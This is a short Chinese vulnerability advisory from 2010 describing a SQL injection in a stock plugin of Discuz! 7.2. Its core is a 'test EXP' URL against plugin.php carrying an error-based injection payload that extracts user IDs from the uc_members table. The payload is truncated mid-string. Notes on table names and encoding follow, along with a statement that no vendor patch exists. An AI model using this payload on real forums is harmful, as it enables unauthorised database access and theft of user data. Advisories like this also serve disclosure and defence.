- 发布日期:2010-07.28 发布作者:H4ckx7 影响版本:PoweredbyDiscuz7.2 官方地址:www.discuz.net 程序介绍: Discuz! 一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务 漏洞插件:
plugin.php
测试EXP:
http://127.0.0.1/plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=49%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,uc_members.uid,0x27,0x7e)%20FROM%20`bbs_data`.uc_members%2
database Tables 视情况而定. 乱码就是编码问题。一般是UTF-8的
解决方案: 厂商补丁: Discuz! ——- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.discuz.net/
标签分类: 注入漏洞 Discuz
每一发奋美文努力的背后,必有加倍的赏赐。
